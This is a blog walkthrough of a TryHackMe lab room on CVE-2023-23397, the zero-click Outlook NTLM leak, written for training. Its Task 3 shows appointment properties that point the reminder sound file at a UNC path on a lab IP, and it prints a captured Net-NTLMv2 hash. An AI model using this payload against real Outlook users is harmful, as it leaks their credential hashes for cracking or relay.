Tryhackme - Outlook NTLM Leak

Tryhackme – Outlook NTLM Leak

In this walk through, we will be going through the Outlook NTLM Leak room from Tryhackme. This room covers the exploitation of CVE-2023-23397 which leak password hashes from a user by sending them an email. So, let’s get started without any delay.

Outlook NTLM Leak

Task 1 – Introduction

Question 1 – Start the VM and continue learning!

Done

On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.

Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.

Microsoft Outlook
Task 1 - Introduction

Task 2 – Abusing Appointment Alerts

Question 1 – Click and continue learning!

Done
Task 2 - Abusing Appointment Alerts

Task 3 – Crafting a Malicious Appointment

Question 1 – Click and continue learning!

Done
Responder

AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = “\10.10.183.48\nonexistent\sound.wav”

Administrator::THM-LAB:ceea8682077d7ab1:42A4F7AD8064006EFC44ADB8794FA5A7:0101000000000000009C3A687269D90106CC8D11F293FFBF0000000002000800560054003200470001001E00570049004E002D0054004E0035005600410057003800450041003000580004003400570049004E002D0054004E003500560041005700380045004100300058002E0056005400320047002E004C004F00430041004C000300140056005400320047002E004C004F00430041004C000500140056005400320047002E004C004F00430041004C0007000800009C3A687269D901060004000200000008003000300000000000000000000000003000009C63A468135C41065CCDB62C9B75754A0B92AD8B8ED1AE763C7EDEB4D8D5657C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E003100380033002E00340038000000000000000000
NTLM hash capture
Task 3 - Crafting a Malicious Appointment

Task 4 – Weaponizing the Vulnerability

Question 1 – Click and continue learning!

Done
Task 4 - Weaponizing the Vulnerability

Task 5 – Detection/Mitigation

Question 1 – Click and continue learning!

Done
Task 5 - Detection/Mitigation

Task 6 – Conclusions

Task 6 - Conclusions

Also Read: Tryhackme – OhSINT

So that was “Outlook NTLM Leak” for you. In this room, we have covered the CVE-2023-23397 which is a critical zero click vulnerability that impacts all versions of the Outlook desktop app on any Windows system. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges and much more. On that note, i will take your leave and will meet you in next one. Till then, “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top